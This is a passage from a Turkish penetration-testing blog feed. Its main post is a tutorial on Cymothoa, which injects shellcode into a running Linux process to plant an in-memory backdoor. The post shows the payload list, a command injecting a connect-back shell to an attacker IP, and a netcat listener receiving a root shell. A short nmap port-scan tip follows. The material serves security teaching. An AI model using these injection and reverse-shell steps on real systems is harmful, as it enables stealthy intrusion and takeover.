<p>Bu yöntemle, process&#8217;in dosya sistemindeki binary&#8217;sine herhangi bir zarar verilmediği için süreç RAM&#8217;de devam eder. Dolayısıyla, kendini diske yazan backdoor&#8217;lara göre tespit edilmesi daha da güçtür. Bir başka yazıda, analiz teknikleri yer alacaktır.</p>
<p><a href="http://blog.bga.com.tr/wp-content/plugins/wordpress-feed-statistics/feed-statistics.php?url=aHR0cDovL3NvdXJjZWZvcmdlLm5ldC9wcm9qZWN0cy9jeW1vdGhvYS8="><strong>Cymothoa</strong></a>, çalışan bir process&#8217;e kod enjekte eden casus bir yazılımdır.Hali hazırda kendi üzerinde bulunan shellcode&#8217;ları enjekte ederek saldırgana uzakdan yönetim ve sistemde görünmez olma imkanı sağlar.</p>
<p><span id="more-2256"></span>Kullanım parametreleri,</p>
<blockquote><p># ./cymothoa<br />
_<br />
_ | |<br />
____ _ _ ____ ___ _| |_| |__ ___ _____<br />
/ ___) | | | \ / _ (_ _) _ \ / _ \(____ |<br />
( (___| |_| | | | | |_| || |_| | | | |_| / ___ |<br />
\____)\__ |_|_|_|\___/ \__)_| |_|\___/\_____|<br />
(____/<br />
Ver.1 (beta) &#8211; Runtime shellcode injection, for stealthy backdoors&#8230;</p>
<p>By codwizard (codwizard@gmail.com) and crossbower (crossbower@gmail.com)<br />
from ES-Malaria by ElectronicSouls (http://www.0&#215;4553.org).</p>
<p>Usage:<br />
cymothoa -p &lt;pid&gt; -s &lt;shellcode_number&gt; [options]</p>
<p>Main options:<br />
-p process pid<br />
-s shellcode number<br />
-l memory region name for shellcode injection (default /lib/ld)<br />
search for &#8220;r-xp&#8221; permissions, see /proc/pid/maps&#8230;<br />
-m memory region name for persistent memory (default /lib/ld)<br />
search for &#8220;rw-p&#8221; permissions, see /proc/pid/maps&#8230;<br />
-h print this help screen<br />
-S list available shellcodes</p>
<p>Injection options (overwrite payload flags):<br />
-f fork parent process<br />
-F don&#8217;t fork parent process<br />
-b create payload thread (probably you need also -F)<br />
-B don&#8217;t create payload thread<br />
-w pass persistent memory address<br />
-W don&#8217;t pass persistent memory address<br />
-a use alarm scheduler<br />
-A don&#8217;t use alarm scheduler<br />
-t use setitimer scheduler<br />
-T don&#8217;t use setitimer scheduler</p>
<p>Payload arguments:<br />
-j set timer (seconds)<br />
-k set timer (microseconds)<br />
-x set the IP<br />
-y set the port number<br />
-r set the port number 2<br />
-z set the username (4 bytes)<br />
-o set the password (8 bytes)<br />
-c set the script code (ex: &#8220;#!/bin/sh\nls; exit 0&#8243;)<br />
escape codes will not be interpreted&#8230;</p></blockquote>
<p><strong>Payload Listesi</strong></p>
<blockquote><p># ./cymothoa -S</p>
<p>0 &#8211; bind /bin/sh to the provided port (requires -y)<br />
1 &#8211; bind /bin/sh + fork() to the provided port (requires -y) &#8211; izik &lt;izik@tty64.org&gt;<br />
2 &#8211; bind /bin/sh to tcp port with password authentication (requires -y -o)<br />
3 &#8211; /bin/sh connect back (requires -x, -y)<br />
4 &#8211; tcp socket proxy (requires -x -y -r) &#8211; Russell Sanford (xort@tty64.org)<br />
5 &#8211; script execution (see the payload), creates a tmp file you must remove<br />
6 &#8211; forks an HTTP Server on port tcp/8800 &#8211; http://xenomuta.tuxfamily.org/<br />
7 &#8211; serial port busybox binding &#8211; phar@stonedcoder.org mdavis@ioactive.com<br />
8 &#8211; forkbomb (just for fun&#8230;) &#8211; Kris Katterjohn<br />
9 &#8211; open cd-rom loop (follows /dev/cdrom symlink) &#8211; izik@tty64.org<br />
10 &#8211; audio (knock knock knock) via /dev/dsp &#8211; Cody Tubbs (pigspigs@yahoo.com)<br />
11 &#8211; POC alarm() scheduled shellcode<br />
12 &#8211; POC setitimer() scheduled shellcode<br />
13 &#8211; alarm() backdoor (requires -j -y) bind port, fork on accept<br />
14 &#8211; setitimer() tail follow (requires -k -x -y) send data via upd</p></blockquote>
<p><strong>Örnek Kullanımı</strong></p>
<p>Shellcode enjekte etmek istediğiniz process&#8217;in process id&#8217;sini belirtmeniz yeterli. /bin/bash kabuğuna bir bakalım,</p>
<blockquote><p># ps ax| grep bash<br />
1725 tty1 S 0:00 -bash<br />
1742 tty1 S+ 0:00 /bin/bash /usr/bin/startx<br />
1959 pts/0 Ss 0:00 bash<br />
1991 pts/0 S+ 0:00 grep &#8211;color=auto bash</p></blockquote>
<p>&#8220;bash&#8221; kabuğunun pid değeri <strong>1959</strong></p>
<p>Hedef sistemden, reverse shell elde etmek için 3 numaralı  payload&#8217;ı kullanacağız.</p>
<blockquote><p><strong># ./cymothoa -p 1959 -s 3 -x 192.168.1.6 -y 4443</strong><br />
[+] attaching to process 1959</p>
<p>register info:<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;<br />
eax value: 0xfffffe00 ebx value: 0xffffffff<br />
esp value: 0xbfcab388 eip value: 0xb7766430<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;</p>
<p>[+] new esp: 0xbfcab384<br />
[+] payload preamble: fork<br />
[+] injecting code into 0xb7767000<br />
[+] copy general purpose registers<br />
[+] detaching from 1959</p>
<p>[+] <span style="color: #ff0000;">infected!!!</span></p></blockquote>
<p>Parametrelerin açıklamaları;</p>
<blockquote><p><strong>-p =</strong> /bin/bash process id&#8217;si</p>
<p><strong>-s =</strong> 3. sıradaki back connect payload&#8217;ı</p>
<p><strong>-x =</strong> back connect yapacağı ip adresi (saldırganın ip adresi)</p>
<p><strong>-y =</strong> back connect yapacağı port numarası</p></blockquote>
<p>Saldırgan, portu dinleme moduna aldığında kurban sistemden shell erişimi elde etmiş olur.</p>
<blockquote><p>ozanus@localhost:~$ nc -vv -l 4443</p>
<p>Connection from 192.168.1.9 port 4443 [tcp/*] accepted<br />
<strong>dir</strong><br />
Makefile cymothoa hexdump_to_cstring.pl personalization.h udp_server<br />
bgrep.c cymothoa.h payloads.h syscalls.txt<br />
<strong>uname -a</strong><br />
Linux seclabs.bga.com.tr 2.6.38 #1 SMP Thu Mar 17 20:52:18 EDT 2011 i686 GNU/Linux<br />
<strong>id</strong><br />
uid=0(root) gid=0(root) groups=0(root)</p>
<p>&nbsp;</p></blockquote>
<p><strong>Yazar:<br />
</strong><strong>Ozan UÇAR<br />
</strong><a href="http://blog.bga.com.tr/wp-content/plugins/wordpress-feed-statistics/feed-statistics.php?url=bWFpbHRvOm96YW4udWNhckBiZ2EuY29tLnRy"><strong>ozan.ucar@bga.com.tr</strong></a></p>
 <img src="http://blog.bga.com.tr/wp-content/plugins/wordpress-feed-statistics/feed-statistics.php?view=1&post_id=2256" width="1" height="1" style="display: none;" />]]></content:encoded>
			<wfw:commentRss>http://blog.bga.com.tr/pentest-2/network-pentest/linux-shellcode-injection/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>[İpucu] Nmap Ile Belirli Portlari Acik Sunucularin Ip Adreslerinin Tespit Edilmesi</title>
		<link>http://blog.bga.com.tr/pentest-2/network-pentest/ipucu-nmap-ile-belirli-portlari-acik-sunucularin-ip-adreslerinin-tespit-edilmesi</link>
		<comments>http://blog.bga.com.tr/pentest-2/network-pentest/ipucu-nmap-ile-belirli-portlari-acik-sunucularin-ip-adreslerinin-tespit-edilmesi#comments</comments>
		<pubDate>Fri, 20 Jan 2012 08:11:27 +0000</pubDate>
		<dc:creator>bga</dc:creator>
				<category><![CDATA[Güvenlik İpuçları]]></category>
		<category><![CDATA[Network Pentest]]></category>
		<category><![CDATA[Pentest]]></category>
		<category><![CDATA[ağ güvenliği]]></category>
		<category><![CDATA[network security]]></category>
		<category><![CDATA[pentest]]></category>

		<guid isPermaLink="false">http://blog.bga.com.tr/?p=2246</guid>
		<description><![CDATA[Sızma testleri sırasında karşılaşılan durumlardan bir taneside belirli portlardan hizmet vermekte olan ip adreslerinin tespit edilmesidir. Örneğin web uygulamaları güvenlik testleri düşünüldüğünde 80/tcp ve 443/tcp portlarından hizmet vermekte olan ip adreslerinin belirlenme işlemi gerekli olabilmektedir. Linux komutu satırı veya herhangi bir betik dili (python, ruby ve ya perl) özellikle sızma testlerinde adımları otomatize ederek iş hızını [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;"><span>Sızma testleri sırasında karşılaşılan durumlardan bir taneside belirli portlardan hizmet vermekte olan ip adreslerinin tespit edilmesidir. Örneğin web uygulamaları güvenlik testleri </span><span>düşünüldüğünde 80/tcp ve 443/tcp portlarından hizmet vermekte olan ip adreslerinin belirlenme işlemi gerekli olabilmektedir.</span></p>
<p style="text-align: justify;"><span>Linux komutu satırı veya herhangi bir betik dili (python, ruby ve ya perl) </span><span>özellikle sızma testlerinde adımları otomatize ederek iş hızını artırmaktadır. </span></p>
<p style="text-align: justify;"><span>192.168.1.0/24 ağı için bu işlem aşağıdaki şekilde linux komut satırından gerçekleştirilebilmektedir.</span>
</p>
<p>&nbsp;</p>
<blockquote><p># nmap -n -PN -sT -p 80,443 192.168.1.1-254 &#8211;open | grep &#8220;report&#8221; | cut -d &#8221; &#8221; -f5 192.168.1.2 192.168.1.4 192.168.1.31 192.168.1.37</p></blockquote>
 <img src="http://blog.bga.com.tr/wp-content/plugins/wordpress-feed-statistics/feed-statistics.php?view=1&post_id=2246" width="1" height="1" style="display: none;" />]]></content:encoded>
			<wfw:commentRss>http://blog.bga.com.tr/pentest-2/network-pentest/ipucu-nmap-ile-belirli-portlari-acik-sunucularin-ip-adreslerinin-tespit-edilmesi/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

